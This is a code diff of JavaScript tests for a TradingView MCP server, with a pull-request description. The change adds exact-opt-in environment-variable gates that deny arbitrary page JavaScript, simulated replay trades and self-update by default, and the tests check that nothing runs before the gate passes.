+import { McpServer } from '@modelcontextprotocol/sdk/server/mcp.js';
+import { Client } from '@modelcontextprotocol/sdk/client/index.js';
+import { InMemoryTransport } from '@modelcontextprotocol/sdk/inMemory.js';
 import { start, step, autoplay, stop, trade, status, VALID_AUTOPLAY_DELAYS } from '../src/core/replay.js';
+import {
+  REPLAY_TRADING_ACK,
+  REPLAY_TRADING_ENV,
+  requireReplayTrading,
+} from '../src/capabilities.js';
+import { registerReplayTools } from '../src/tools/replay.js';
+import { getRegisteredHandler } from '../src/cli/router.js';
+import '../src/cli/commands/replay.js';
+
+const replayTradingEnv = { [REPLAY_TRADING_ENV]: REPLAY_TRADING_ACK };
 
 // ── Mock helpers ─────────────────────────────────────────────────────────
 
@@ -37,6 +50,20 @@ function mockGetReplayApi() {
 function mockDeps(responses = {}, sequence) {
   const evaluate = mockEvaluate(responses, sequence);
   return { _deps: { evaluate, getReplayApi: mockGetReplayApi() }, evaluate };
+}
+
+async function callReplayTradeThroughSdk(args, deps) {
+  const server = new McpServer({ name: 'replay-test', version: '1.0.0' });
+  const client = new Client({ name: 'replay-test-client', version: '1.0.0' });
+  registerReplayTools(server, deps);
+  const [clientTransport, serverTransport] = InMemoryTransport.createLinkedPair();
+
+  await Promise.all([client.connect(clientTransport), server.connect(serverTransport)]);
+  try {
+    return await client.callTool({ name: 'replay_trade', arguments: args });
+  } finally {
+    await Promise.all([client.close(), server.close()]);
+  }
 }
 
 // ── start() ──────────────────────────────────────────────────────────────
@@ -286,6 +313,32 @@ describe('stop()', () => {
 // ── trade() ──────────────────────────────────────────────────────────────
 
 describe('trade()', () => {
+  it('is denied by default before resolving the replay API or calling CDP', async () => {
+    let replayApiCalls = 0;
+    let evaluateCalls = 0;
+
+    await assert.rejects(
+      () => trade({
+        action: 'buy',
+        _deps: {
+          env: {},
+          getReplayApi: async () => { replayApiCalls++; },
+          evaluate: async () => { evaluateCalls++; },
+        },
+      }),
+      new RegExp(`${REPLAY_TRADING_ENV}=${REPLAY_TRADING_ACK}`),
+    );
+
+    assert.equal(replayApiCalls, 0);
+    assert.equal(evaluateCalls, 0);
+  });
+
+  it('rejects truthy and near-match capability values', () => {
+    for (const value of ['1', 'true', REPLAY_TRADING_ACK.toLowerCase(), `${REPLAY_TRADING_ACK} `]) {
+      assert.throws(() => requireReplayTrading({ [REPLAY_TRADING_ENV]: value }), /disabled/);
+    }
+  });
+
   for (const action of ['buy', 'sell', 'close']) {
     it(`executes ${action} action`, async () => {
       const { _deps, evaluate } = mockDeps({
@@ -294,6 +347,7 @@ describe('trade()', () => {
         'position': 1,
         'realizedPL': 50.5,
       });
+      _deps.env = replayTradingEnv;
       const result = await trade({ action, _deps });
       assert.equal(result.success, true);
       assert.equal(result.action, action);
@@ -304,6 +358,7 @@ describe('trade()', () => {
 
   it('throws on invalid action', async () => {
     const { _deps } = mockDeps({ 'isReplayStarted': true });
+    _deps.env = replayTradingEnv;
     await assert.rejects(
       () => trade({ action: 'hold', _deps }),
       (err) => err.message.includes('Invalid action'),
@@ -312,17 +367,78 @@ describe('trade()', () => {
 
   it('throws when replay not started', async () => {
     const { _deps } = mockDeps({ 'isReplayStarted': false });
+    _deps.env = replayTradingEnv;
     await assert.rejects(
       () => trade({ action: 'buy', _deps }),
       (err) => err.message.includes('not started'),
     );
+  });
+
+  it('denies present and missing CLI actions before CDP access', async () => {
+    let evaluated = false;
+    const handler = getRegisteredHandler('replay', 'trade');
+    for (const positionals of [['buy'], []]) {
+      await assert.rejects(
+        () => handler({}, positionals, { env: {}, evaluate: async () => { evaluated = true; } }),
+        new RegExp(REPLAY_TRADING_ENV),
+      );
+    }
+    assert.equal(evaluated, false);
+  });
+
+  it('validates missing CLI action only after exact opt-in', async () => {
+    const handler = getRegisteredHandler('replay', 'trade');
+    await assert.rejects(
+      () => handler({}, [], { env: replayTradingEnv }),
+      /Invalid action/,
+    );
+  });
+
+  it('allows the actual registered CLI replay trade handler with exact opt-in', async () => {
+    const { _deps } = mockDeps({
+      'isReplayStarted': true,
+      'buy': undefined,
+      'position': 1,
+      'realizedPL': 0,
+    });
+    _deps.env = replayTradingEnv;
+    const handler = getRegisteredHandler('replay', 'trade');
+
+    const result = await handler({}, ['buy'], _deps);
+    assert.deepEqual(result, { success: true, action: 'buy', position: 1, realized_pnl: 0 });
+  });
+
+  it('denies arbitrary and missing MCP actions at the gate through the SDK boundary', async () => {
+    for (const args of [{ action: 'buy' }, { action: { arbitrary: true } }, {}]) {
+      const response = await callReplayTradeThroughSdk(args, {
+        env: {},
+        evaluate: async () => assert.fail('must not evaluate'),
+        getReplayApi: async () => assert.fail('must not resolve replay API'),
+      });
+      const body = JSON.parse(response.content[0].text);
+
+      assert.equal(response.isError, true);
+      assert.match(body.error, new RegExp(REPLAY_TRADING_ENV));
+      assert.doesNotMatch(body.error, /Invalid action/);
+    }
+  });
+
+  it('validates MCP action only after exact opt-in through the SDK boundary', async () => {
+    for (const args of [{ action: 'hold' }, {}]) {
+      const response = await callReplayTradeThroughSdk(args, { env: replayTradingEnv });
+      const body = JSON.parse(response.content[0].text);
+
+      assert.equal(response.isError, true);
+      assert.match(body.error, /Invalid action/);
+      assert.doesNotMatch(body.error, /disabled/);
+    }
   });
 });
 
 // ── status() ─────────────────────────────────────────────────────────────
 
 describe('status()', () => {
-  it('returns full status object', async () => {
+  it('remains available without enabling simulated Replay trades', async () => {
     let callIdx = 0;
     const evaluate = async (expr) => {
       callIdx++;
@@ -344,7 +460,7 @@ describe('status()', () => {
       return undefined;
     };
     evaluate.calls = [];
-    const result = await status({ _deps: { evaluate, getReplayApi: mockGetReplayApi() } });
+    const result = await status({ _deps: { env: {}, evaluate, getReplayApi: mockGetReplayApi() } });
     assert.equal(result.success, true);
     assert.equal(result.is_replay_started, true);
     assert.equal(result.current_date, 1700000000);

--- a/tests/update.test.js
+++ b/tests/update.test.js
@@ -6,9 +6,13 @@
 import { describe, it } from 'node:test';
 import assert from 'node:assert/strict';
 import { update } from '../src/core/update.js';
+import { SELF_UPDATE_ACK, SELF_UPDATE_ENV, requireSelfUpdate } from '../src/capabilities.js';
+import { getRegisteredHandler } from '../src/cli/router.js';
+import '../src/cli/commands/health.js';
 
 const OLD = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa';
 const NEW = 'bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb';
+const selfUpdateEnv = { [SELF_UPDATE_ENV]: SELF_UPDATE_ACK };
 
 /**
  * Build DI deps simulating a git repo.
@@ -17,6 +21,7 @@ const NEW = 'bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb';
 function gitDeps({ branch = 'main', dirty = '', remoteSha = OLD, ahead = 0, behind = 0, lockChanged = false, npmFails = false } = {}) {
   const state = { merged: false, npmCi: 0, cmds: [] };
   const deps = {
+    env: selfUpdateEnv,
     existsSync: () => true,
     repoRoot: 'C:/fake/repo',
     execSync: (cmd) => {
@@ -40,6 +45,45 @@ function gitDeps({ branch = 'main', dirty = '', remoteSha = OLD, ahead = 0, behi
   };
   return { deps, state };
 }
+
+describe('update() — self-update capability gate', () => {
+  it('is denied by default before any git, network, or npm side effect', async () => {
+    const { deps, state } = gitDeps({ remoteSha: NEW, behind: 1, lockChanged: true });
+    deps.env = {};
+    await assert.rejects(
+      () => update({ _deps: deps }),
+      new RegExp(`${SELF_UPDATE_ENV}=${SELF_UPDATE_ACK}`),
+    );
+    assert.equal(state.cmds.length, 0, 'no git/npm command executed');
+    assert.equal(state.npmCi, 0);
+  });
+
+  it('rejects truthy and near-match capability values', () => {
+    for (const value of ['1', 'true', SELF_UPDATE_ACK.toLowerCase(), `${SELF_UPDATE_ACK} `]) {
+      assert.throws(() => requireSelfUpdate({ [SELF_UPDATE_ENV]: value }), /disabled/);
+    }
+  });
+
+  it('denies the actual registered CLI update handler before side effects', async () => {
+    const { deps, state } = gitDeps({ remoteSha: NEW, behind: 1 });
+    deps.env = {};
+    const handler = getRegisteredHandler('update');
+    await assert.rejects(
+      () => handler({}, [], deps),
+      new RegExp(SELF_UPDATE_ENV),
+    );
+    assert.equal(state.cmds.length, 0, 'no git/npm command executed');
+  });
+
+  it('allows the registered CLI update handler after exact opt-in', async () => {
+    const { deps } = gitDeps({ remoteSha: NEW, behind: 2 });
+    const handler = getRegisteredHandler('update');
+    const r = await handler({}, [], deps);
+    assert.equal(r.success, true);
+    assert.equal(r.updated, true);
+    assert.equal(r.commits_pulled, 2);
+  });
+});
 
 describe('update() — guards', () => {
   it('refuses non-git installs with a clone hint', async () => {


### PR DESCRIPTION
## Summary

Hardens the two dangerous MCP capabilities so they are **fail-closed by default** and only run after a deliberate, exact opt-in.

- `ui_evaluate` (arbitrary page JavaScript) and `replay_trade` (simulated Bar Replay position changes) are denied **before any CDP call** unless the server or CLI is started with an exact acknowledgment env var.
- Near-match and generic truthy values (`1`, `true`, lowercased ack, trailing space) are rejected — only the exact ack string enables the capability.
- The capability gate runs **before** schema validation, replay-API resolution, and CDP access, at the real MCP (`McpServer`) and CLI registration boundaries — not just at the core function.
- Replay navigation (`replay_start`, `replay_step`, `replay_autoplay`, `replay_status`, `replay_stop`) stays available without enabling simulated trades.

## Opt-in values

```text
TRADINGVIEW_MCP_ALLOW_ARBITRARY_PAGE_JS=I_UNDERSTAND_THIS_EXECUTES_ARBITRARY_JAVASCRIPT
TRADINGVIEW_MCP_ALLOW_REPLAY_TRADES=I_UNDERSTAND_THIS_CHANGES_SIMULATED_REPLAY_POSITIONS
```

## Docs

Corrected README/SECURITY claims: the MCP-to-Desktop transport is local, but the authenticated TradingView session and several tools can still reach TradingView services. The gate cannot prove demo/paper isolation — real brokers must be disconnected.

## Tests

- New `tests/capabilities.test.js` and expanded `tests/replay.test.js` cover default denial, near-match rejection, exact opt-in, valid-action pass-through, and both the SDK and registered-CLI boundaries.
- New `test:safe` npm script.
- Verified: `git diff --check` clean · 128 safe tests pass · lint 0 errors.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01UpZNatyXedsPXBXNEHJxGi